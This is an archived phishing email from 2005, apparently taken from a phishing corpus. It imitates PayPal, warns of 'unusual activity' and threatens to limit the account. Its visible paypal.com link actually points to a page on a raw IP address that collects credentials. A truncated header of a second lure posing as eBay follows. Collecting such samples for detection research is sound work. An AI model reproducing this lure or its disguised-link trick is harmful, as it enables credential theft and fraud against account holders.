From: update@paypal.com <service@paypal.com>
Content-Type: text/html
Message-Id: <20050809230455.19BDB1C0E93@bcreativegroup.com>
Date: Tue,  9 Aug 2005 19:04:55 -0400 (EDT)
Content-Length: 4614
Lines: 97
Status: RO
X-Status: 
X-Keywords:                 
X-UID: 167


<br><table style="width:600px" cellpadding="0" cellspacing="0" border="0" align="center">
 <tr>
<img SRC="http://paypal.com/en_US/i/logo/paypal_logo.gif"  BORDER=0 height=50 width=200>
 </tr>
</table>
 
        <hr noShade size=1>
<img src="http://paypal.com/en_US/i/scr/pixel.gif" width=1 height=10><br>
         
<table style="width:600px" cellpadding="0" cellspacing="0" border="0" align="center">
 <tr>
    <td><font style="font-size:17px" style="font-family:Verdana, Arial, Helvetica, sans-serif" style="font-weight:700" color="#003366">Security Center</font></TD>
 </tr>
 <tr>
  <td><img src="http://paypal.com/en_US/i/scr/pixel.gif" width="2" height="2"></td>
 </tr>
</table>
<table style="width:600px" cellpadding="0" cellspacing="0" border="0" align="center">
 <tr>
  <td><img src="http://paypal.com/en_US/i/scr/pixel.gif" width=6 height=6></td>
 </tr>
 <tr>
  <td bgcolor=#999999 width=100%><img src="http://paypal.com/en_US/i/scr/pixel.gif" width=1 height=2></td>
 </tr>
 <tr>
  <td><img src="http://paypal.com/en_US/i/scr/pixel.gif" width=6 height=6></td>
 </tr>
</table>
<!-- begin main -->
<table style="width:600px" cellspacing="0" cellpadding="0" border="0" align="center">
 <tr valign="top">
  <td>
   <table style="width:600px" cellpadding="0" cellspacing="0" border="0" align="center">
    <tr>
     <td width="240"><img src="http://paypal.com/en_US/i/header/hdr_securityCenter_240x120.gif" valign="top"><br><br></td>
     <td width="20"> </td>
     <td  style="font-size:13px" style="font-family:Verdana, Arial, Helvetica, sans-serif" style="font-weight:400"><span style="font-weight:700">Military Grade Encryption is Only the Start</font></span><br><br>At PayPal, we want to increase your security and comfort level with every transaction. From our Buyer and Seller Protection Policies to our Verification and Reputation systems, we'll help to keep you safe.</span><br><br></td>
    </tr>
   </table>
  </td>
 </tr>
</table>
<!-- end main -->
<table style="width:600px" cellpadding="0" cellspacing="0" border="0" align="center">
 <tr>
  <td><img src="http://paypal.com/en_US/i/scr/pixel.gif" width=6 height=6></td>
 </tr>
 <tr>
  <td bgcolor=#999999 width=100%><img src="http://paypal.com/en_US/i/scr/pixel.gif" width=1 height=2></td>
 </tr>
 <tr>
  <td><img src="http://paypal.com/en_US/i/scr/pixel.gif" width=6 height=6></td>
 </tr>
</table>
<table style="width:600px" cellpadding="0" cellspacing="0" border="0" align="center">
 <tr>
<td style="font-size:13px" style="font-family:Verdana, Arial, Helvetica, sans-serif" style="font-weight:400"><span style="font-weight:700">
<br><br>
 PayPal is committed to maintaining a safe environment for its community of buyers and sellers. To protect the security of your account, PayPal employs <br>some of the most
advanced security systems in the world and our anti-fraud teams regularly screen the PayPal system for unusual activity.<br><br>
Recently, our Account Review Team identified some unusual activity in your account. 
In accordance with PayPal's User Agreement access to your account will be limited.
This is a fraud prevention measure meant to ensure that your account is not compromised.
<br><br>
In order to secure your account we may require some specific information from you.
We encourage you to log in by clicking on the link below and complete the requested form as soon as possible.
<br><br><br><a href="http://202.64.35.125/.paypal/index.php">https://www.paypal.com/cgi-bin/webscr?cmd=_login-run</a><br><br>
<br>
Ignoring our request, for an extended period of time, may result in account limitations
or may result in eventual account closure.<br><br>
Thank you for your prompt attention to this matter. Please understand that this is <br>a security measure meant to help protect you and your account.<br> We apologize for any inconvenience.
<br><br><br>
</span>
Sincerely,<br>
PayPal Account Review Department<br>
<br><br>
PayPal Email ID PP4392
</td>
 </tr>
</table>
<hr noShade size=1>
<table style="width:600px" cellspacing="0" cellpadding="0" border="0" align="center">
 <tr valign="top">
  <td>
   <table style="width:600px" cellpadding="0" cellspacing="0" border="0" align="center">
    <tr>
     <td  style="font-size:13px" style="font-family:Verdana, Arial, Helvetica, sans-serif" style="font-weight:400">*Please do not respond to this e-mail as your reply will not be received.<br><br></td>
     <td width="20"> </td>
     <td width="100"><img src="http://images.paypal.com/images/verification_seal.gif"  BORDER=0 height=100 width=100 valign="top"><br><br></td>
    </tr>
   </table>
  </td>
 </tr>
</table><br><br>



From support_refnum_26@ebay.com  Wed Aug 10 03:00:54 2005
Return-Path: <support_refnum_26@ebay.com>
X-Original-To: jose@login.monkey.org
Delivered-To: jose@login.monkey.org
Received: from mail2.monkey.org (mail2.monkey.org [204.181.64.8])
	by naughty.monkey.org (Postfix) with ESMTP id 81646536EAD
	for <jose@login.monkey.org>; Wed, 10 Aug 2005 03:00:53 -0400 (EDT)
Received: from dsl.dynamic81214105198.ttnet.net.tr (unknown [81.214.105.198])
	by mail2.monkey.org (Postfix) with SMTP id A9B13183808
	for <jose@monkey.org>; Wed, 10 Aug 2005 02:59:58 -0400 (EDT)
FCC: mailbox://support_refnum_26@ebay.com/Sent
X-Identity-Key: id1
Date: Wed, 10 Aug 2005 13:50:56 +0600
